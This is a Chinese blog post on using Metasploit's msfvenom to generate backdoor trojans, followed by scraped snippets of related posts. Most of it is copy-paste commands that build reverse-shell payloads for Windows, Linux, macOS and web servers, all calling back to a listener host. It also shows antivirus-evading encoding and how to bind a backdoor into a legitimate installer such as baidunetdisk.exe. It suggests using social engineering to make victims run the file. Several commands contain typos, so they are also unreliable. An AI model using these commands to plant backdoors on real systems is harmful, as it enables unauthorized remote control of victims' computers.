【木马生成工具】Msfvenom介绍及利用
Msfvenom介绍及利用
简介
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
参数介绍
-l
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-p
指定需要使用的payload(攻击荷载)。
-f
指定输出格式
Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;
Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;
-e
指定需要使用的encoder(编码器)编码免杀。
-a
指定payload的目标架构
选择架构平台:x86 | x64 | x86_64
Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
-o
保存payload文件输出。
-b
设定规避字符集,比如: '\x00\xff'避免使用的字符
-n
为payload预先指定一个NOP滑动长度
-s
设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。
-i
指定payload的编码次数
-c
指定一个附加的win32 shellcode文件
-x
指定一个自定义的可执行文件作为模板
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
-k
保护模板程序的动作,注入的payload作为一个新的进程运行
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
-v
指定一个自定义的变量,以确定输出格式
Mcfvenom实例
普通生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
编码处理
msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikita_ga_nai lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
捆绑
msfvenom -p windows/meterpreter/reverse_tcp -p latform windows -a x64 -x /root/baidunetdisk.exe -k lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
Windows
msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f exe -o /root/shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.1.10 port=4444 -f macho > shell.macho
Php
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
Asp
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f asp
Aspx
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f aspx
Jsp
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.10 port=4444 -f raw
War
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f war
Bash
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.10 port=4444 -f bash
Perl
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.10 port=4444 -f raw
Python
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 port=4444 -f raw
应用实例
msfvenom的shell在windows中的使用
1.使用msfvenom生成windows可执行后门文件
2.将后门文件放入windows机器中(现实中可使用社工的方法进行诱导)
3.设置监听
4.启动监听,并运行密码文件后成功获取到shell
【木马生成工具】Msfvenom介绍及利用相关推荐
- Msfvenom介绍及利用
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpaylo ...
- 14、TheFatRat木马生成工具-创建后门或payload
kail攻击主机: Kali 192.168.11.106 靶机:windows server 2008 r2 192.168.11.134 x64 32位 一.TheFatRat介绍 TheFa ...
- msfvenom木马生成工具
msfvenom 命令 常见shell 实例 参考 命令 -l:列出所有模块.类型有:payloads, encoders, nops, platforms, archs, encrypt, form ...
- 几个比较好的微信图文编辑器和二维码图片生成工具网站介绍给你!
小小我收藏了一些非常实用但是排名不是太靠前的网站,不过毕竟好东西不能独享,这次小小就把这些多年珍藏的"宝贝"公之于众,大家以后用到的时候别忘了小小哦(*^ワ^*) 一·让你的微信公 ...
- 字典生成工具_CANOpen系列教程09_CANOpen对象字典
说明: 本文原创作者『strongerHuang』 首发于微信公众号『嵌入式专栏』,同时也更新在我的个人网站:EmbeddedDevelop 标签:CAN. CANOpen. CanFestival ...
- 软件推荐——二维码生成工具(绿色版)
Simple Code Generator 二维码生成工具 软件介绍: Simple Code Generator是一款适用于Windows的简单工具,它允许您快速生成二维码,以便在智能手机上使用应用 ...
- toxssin:一款功能强大的XSS漏洞扫描利用和Payload生成工具
关于toxssin toxssin是一款功能强大的XSS漏洞扫描利用和Payload生成工具,这款渗透测试工具能够帮助广大研究人员自动扫描.检测和利用跨站脚本XSS漏洞.该工具由一台HTTPS服务器组 ...
- PyTorch:采用sklearn 工具生成这样的合成数据集+利用PyTorch实现简单合成数据集上的线性回归进行数据分析
PyTorch:采用sklearn 工具生成这样的合成数据集+利用PyTorch实现简单合成数据集上的线性回归进行数据分析 目录 输出结果 核心代码 输出结果 核心代码 #PyTorch:采用skle ...
- 基于bboss开发平台eclipse开发工程生成工具介绍
为什么80%的码农都做不了架构师?>>> 基于bboss开发平台eclipse开发工程生成工具介绍 一.工具简介 bboss开发平台发布出两个资源包: war部署包 数 ...
最新文章
- java 初识对象和对象引用的关系
- 软件测试之黑盒测试-等价类划分法
- 解决w3wp.exe内存占用问题[转载]
- Android RecyclerView封装下拉刷新与上拉加载更多
- 上班按小时的怎么记,小时工计时怎么用便签记上个月的工时
- 第二课 做站群之前的准备工作
- word 生成pdf_为什么Microsoft Word生成的PDF文件这么大?
- 如何处理计算机显卡故障,显卡出现故障怎么办
- php 图片折角处理,如何使用CSS3实现折角效果
- [noip2011]铺地毯(carpet)解题报告
- 安卓系统手机如何用作电脑摄像头使用及解决方法
- 如何在PPT中同时插入多张图片且每张占一页
- OAuth 2.0实战(一)-通俗光速入门
- mysql rollback.pl_设置_smu_debug_mode实现指定session级别使用特定回滚段
- Spark mlib KMeans聚类算法
- Linux系统管理实践(7):网络配置
- 程序求1!+2!+3!+...+1000!的和, 求1到1000阶乘之和
- 海格里斯穿梭车操作指南五步曲
- 你不看足球,你就不会懂:这些主场有多美?
- html5 便签墙,12个爆有趣的室内亲子游戏,在家也能玩出花样!
热门文章
- 异常java.io.NotSerializableException
- Scrum板与Kanban如何抉择?敏捷工具:xsqixhs板与按照ffgwtsmksy
- r语言把两个折线图图像放到一个图里_图像目标检测算法总结(从R-CNN到YOLO v3)...
- Word格式之参考文献交叉引用
- 肝完《浏览器基本原理与实践》后,我总结了这 36 点
- 免费网盘如何选择@2020年
- 【Spring AOP】@Aspect结合案例详解(二): @Pointcut使用@within和within(已附源码)
- Mac重装系统失败-没有符合安装资格的软件包
- android 平板版 office,Android平板版Office评测:界面繁杂影响用户体验
- 通过 PRTG EXE 高级监控脚本 + python 监控华为防火墙线路健康状态